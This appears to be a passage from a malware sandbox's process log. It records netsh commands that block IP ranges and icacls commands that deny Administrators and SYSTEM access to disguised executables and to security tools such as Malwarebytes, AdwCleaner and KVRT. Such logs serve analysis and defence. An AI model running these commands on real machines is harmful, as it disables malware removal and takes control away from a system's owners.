C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP2" protocol=TCP action=block dir=out remoteip=61.216.5.1-61.216.5.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP3" protocol=TCP action=block dir=IN remoteip=118.184.176.1-118.184.176.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP4" protocol=TCP action=block dir=out remoteip=118.184.176.1-118.184.176.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP5" protocol=TCP action=block dir=IN remoteip=163.171.140.1-163.171.140.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP6" protocol=TCP action=block dir=out remoteip=163.171.140.1-163.171.140.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP7" protocol=TCP action=block dir=IN remoteip=160.153.246.1-160.153.246.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP8" protocol=TCP action=block dir=out remoteip=160.153.246.1-160.153.246.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP9" protocol=TCP action=block dir=IN remoteip=195.22.26.1-195.22.26.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2484⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP10" protocol=TCP action=block dir=out remoteip=195.22.26.1-195.22.26.2485⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP11" protocol=TCP action=block dir=IN remoteip=59.125.179.1-59.125.179.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP12" protocol=TCP action=block dir=out remoteip=59.125.179.1-59.125.179.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP13" protocol=TCP action=block dir=IN remoteip=59.124.90.1-59.124.90.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2554⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP14" protocol=TCP action=block dir=out remoteip=59.124.90.1-59.124.90.2555⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP15" protocol=TCP action=block dir=IN remoteip=172.104.56.1135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1134⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP16" protocol=TCP action=block dir=OUT remoteip=172.104.56.1135⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP17" protocol=TCP action=block dir=IN remoteip=178.128.101.725⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.724⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP18" protocol=TCP action=block dir=out remoteip=178.128.101.725⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP19" protocol=TCP action=block dir=IN remoteip=210.108.146.965⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.964⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP20" protocol=TCP action=block dir=out remoteip=210.108.146.965⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP21" protocol=TCP action=block dir=IN remoteip=176.57.70.815⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.814⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP22" protocol=TCP action=block dir=out remoteip=176.57.70.815⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP23" protocol=TCP action=block dir=IN remoteip=61.130.8.225⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.224⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP24" protocol=TCP action=block dir=out remoteip=61.130.8.225⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP25" protocol=TCP action=block dir=IN remoteip=134.209.181.1865⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1864⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP26" protocol=TCP action=block dir=out remoteip=134.209.181.1865⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP27" protocol=TCP action=block dir=IN remoteip=134.209.188.1695⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1694⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP28" protocol=TCP action=block dir=out remoteip=134.209.188.1695⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP29" protocol=TCP action=block dir=IN remoteip=165.22.143.115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.114⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP30" protocol=TCP action=block dir=out remoteip=165.22.143.115⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=157.230.120.2365⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2364⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=157.230.120.2365⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=156.67.216.615⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.614⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=156.67.216.615⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=165.22.23.1025⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1024⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=165.22.23.1025⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=178.128.74.1515⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1514⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=178.128.74.1515⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=104.248.92.265⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.264⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=104.248.92.265⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP31" protocol=TCP action=block dir=IN remoteip=167.71.52.2305⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2304⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="HTTP32" protocol=TCP action=block dir=out remoteip=167.71.52.2305⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\lsmm.exe" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\WINDOWS\inf\msief.exe" /deny Administrators:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny Administrators:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\NetworkDistribution" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\java.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\java.exe /deny система:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iexplore.exe" /deny System:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\windows\svchost.exe /deny система:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\windows\svchost.exe /deny система:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\kz.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\kz.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\script.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\script.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny Администраторы:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\olly.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\olly.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\lsass2.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\lsass2.exe /deny System:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny Администраторы:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny Администраторы:(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\boy.exe /deny System:(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\boy.exe /deny System:(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Администраторы:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)4⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Администраторы:(OI)(CI)(F)5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
-
